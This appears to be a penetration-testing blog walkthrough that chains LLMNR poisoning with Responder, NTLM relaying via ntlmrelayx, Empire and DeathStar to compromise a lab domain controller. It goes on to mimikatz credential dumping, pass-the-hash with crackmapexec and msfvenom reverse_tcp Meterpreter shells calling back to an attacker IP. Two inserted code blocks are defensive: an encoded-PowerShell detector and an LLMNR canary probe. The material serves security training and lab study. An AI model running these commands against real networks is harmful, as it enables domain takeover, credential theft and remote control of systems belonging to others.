Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

Ntlmrelayx.py (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way during a penetration test. The problem is that NTLMv2 hashes cannot be passed (regular NTLM hashes can), and if your dictionary isn’t good or a strict password policy with numbers and special characters is enforced, you’ll be sitting with an NTLMv2 hash and a username and nothing to do with them. However, there is the option of relaying that username and hash. The nasty thing is that NTLM relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What’s even worse is that there are a few tools that can automate the entire damn thing.

Now, before I get started, there are a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali: the Python requests library there refuses to negotiate any TLS version lower than 1.2.
  2. The first part of this process assumes that NTLM relaying is possible; if SMB signing is enabled, the entire operation is dead in the water. By default it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent onto a machine by any means possible, Deathstar will do its stuff. It doesn’t NEED NTLM relaying; this is just an interesting way of getting an Empire agent.
  3. I’m doing this on my lab network, not someone else’s. This demo simulates what can happen if LLMNR spoofing is possible and a domain admin’s credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do, and I encourage you to read about its capabilities here.

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100

The listener IP is whatever IP Empire is listening on. -t 100 gives it 100 threads to run, so it’s faster.

Next, I generate the PowerShell launcher from Empire. To do this, go to the listeners menu in Empire by typing

Listeners

From here, I create the payload by using the command

launcher powershell Deathstar

Copy the PowerShell launcher; you’ll paste it in a minute.

Next, I set up ntlmrelayx.py (guide to setting up ntlmrelayx.py here).

sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc [powershell code]'

ntlmrelayx.py also accepts a file of targets with the -tf switch, so you can supply multiple targets if you want. Note that the PowerShell launcher must be in quotes or it won’t run.

Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP, so that Responder does not answer those connections itself and ntlmrelayx.py can pick them up.

Finally, start up Responder

sudo python Responder.py -I ens33 -r -d -v

My screen then looks like this once it’s all set up.
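The command that ntlmrelayx.py runs on the target is an encoded PowerShell launcher (-noP -sta -w 1 -enc). As an added example that is not part of the original post, here is a small detector that scans process-creation records for that launcher shape and decodes the payload so an analyst can see what ran. The event records, host names and the encoded one-liner are constructed for the example.

```python
import base64
import shlex

# Added example, not from the article: flag process-creation records (Security 4688 /
# Sysmon 1 style) whose command line has the shape of the encoded launcher that the
# relay above executes on the target, and decode the payload for the analyst.
def _abbrev(tok, full, min_len):  # PowerShell accepts prefixes: -enc, -noP, -w ...
    t = tok.lstrip("-/").lower()
    return min_len <= len(t) and full.startswith(t)

def analyze_cmdline(cmdline):
    """Indicators and decoded script if cmdline is an encoded launcher, else None."""
    toks = shlex.split(cmdline, posix=False)  # non-posix keeps Windows backslashes
    if not toks or "powershell" not in toks[0].lower():
        return None
    found, decoded = set(), None
    for i, tok in enumerate(toks[1:], start=1):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if _abbrev(tok, "encodedcommand", 1) and nxt:
            found.add("EncodedCommand")
            try:  # -EncodedCommand carries base64 of UTF-16LE text
                decoded = base64.b64decode(nxt).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = None  # keep the alert even if the payload is mangled
        elif _abbrev(tok, "noprofile", 3):
            found.add("NoProfile")
        elif _abbrev(tok, "windowstyle", 1) and nxt.lower() in ("1", "hidden"):
            found.add("WindowStyle=hidden")
        elif _abbrev(tok, "sta", 3):
            found.add("STA")
    if "EncodedCommand" not in found:
        return None
    return {"indicators": sorted(found), "decoded": decoded}

def scan_events(events):
    """events: dicts with 'host' and 'cmdline'; returns one alert per matching record."""
    alerts = []
    for ev in events:
        hit = analyze_cmdline(ev["cmdline"])
        if hit:
            alerts.append({"host": ev["host"], **hit})
    return alerts

def encode_ps(script):  # what PowerShell expects for -EncodedCommand
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample records; the encoded payload is a harmless one-liner.
SAMPLE_EVENTS = [
    {"host": "FS01", "cmdline": "powershell -noP -sta -w 1 -enc " + encode_ps("Write-Output 'hi'")},
    {"host": "WS07", "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
]
```

Feed it real 4688 or Sysmon command lines and the decoded field shows the stager that an EDR or SIEM rule keyed only on "powershell.exe" would miss.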

Next, using my Windows machine, I simulate the domain admin mistyping a share name, which generates an LLMNR request.

Poisoned answer is then sent via Responder

NTLMv2 hashed credentials are relayed

Empire agent opened

Deathstar automatically starts doing its thing

Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.

An Empire agent is now running on the DC
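The chain above starts with Responder answering an LLMNR query for a name that does not exist. That is also what gives a poisoner away: a canary query for a name that cannot exist should never get an answer. The following is an added example, not code from the post or from Responder; it builds and parses LLMNR packets per RFC 4795, and assumes an IPv4 host on the same segment as the suspected poisoner. fake_reply only constructs a poisoner-shaped answer for offline testing.

```python
import os
import socket
import struct

# Added example, not from the article: a canary probe that detects an LLMNR poisoner such
# as the Responder instance above. A query for a name that cannot exist should get no answer.
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def encode_name(name):  # DNS-style label encoding used by LLMNR (RFC 4795)
    return b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"

def build_query(name, txid):  # header (id, flags, qd, an, ns, ar) + one A/IN question
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)

def parse_answer(data, txid, name):
    """A-record IPs from a reply to our query; [] for anything else or malformed data."""
    qname = encode_name(name)
    try:
        rid, flags, _qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
        if rid != txid or not flags & 0x8000 or data[12:12 + len(qname)] != qname:
            return []
        off, ips = 12 + len(qname) + 4, []  # skip question name, type, class
        for _ in range(an):
            while data[off] and data[off] & 0xC0 != 0xC0:  # walk the answer's labels
                off += data[off] + 1
            off += 2 if data[off] & 0xC0 == 0xC0 else 1  # compression pointer or root label
            rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            if rtype == 1 and rclass == 1 and rdlen == 4:
                ips.append(socket.inet_ntoa(data[off:off + 4]))
            off += rdlen
        return ips
    except (struct.error, IndexError, OSError):
        return []  # truncated or malformed packet

def canary_probe(timeout=2.0):
    """Send one canary query to the LLMNR group; (source, ips) of the first reply, or None."""
    name, txid = "canary-" + os.urandom(6).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    try:
        data, (src, _) = sock.recvfrom(1024)
    except socket.timeout:
        return None  # silence is the expected, healthy result
    return src, parse_answer(data, txid, name)

def fake_reply(name, txid, ip):  # constructed poisoner-style reply, for offline testing only
    rr = encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(ip)
    return struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0) + build_query(name, txid)[12:] + rr
```

Running canary_probe() periodically from a monitoring host and alerting on any non-None result is a cheap complement to the real fix, which is disabling LLMNR by policy and requiring SMB signing.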

The final step is to get a shell.

There are many ways to do this:

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more, research it.

Using Mimikatz & Crackmapexec to open Meterpreter Shell

First, interact with the agent. Always use the agent with SYSTEM privileges: while user “god” is a domain admin, SYSTEM is still a higher privilege.

interact [agent name]

Then run mimikatz

mimikatz

After a minute it’ll spit out a ton of info. Ignore it by pressing Enter, then type

creds

and a nice table is shown.

As you can see, it found the hashes and the plaintext password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First, set up multi/handler in Metasploit.

Then run crackmapexec. Even though I have the password in plaintext, I’m using the hash here to show that pass-the-hash (PTH) is possible.

crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443

Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe

Copy the .exe into the Empire directory

Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe.

Grats on shell

There are many more ways to get from an agent to a shell, but these are two of the easiest, although uploading an executable is not the stealthiest and is probably the least recommended. Still, a shell is a shell.

Extra Resources and credit for Deathstar & Crackmapexec:

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
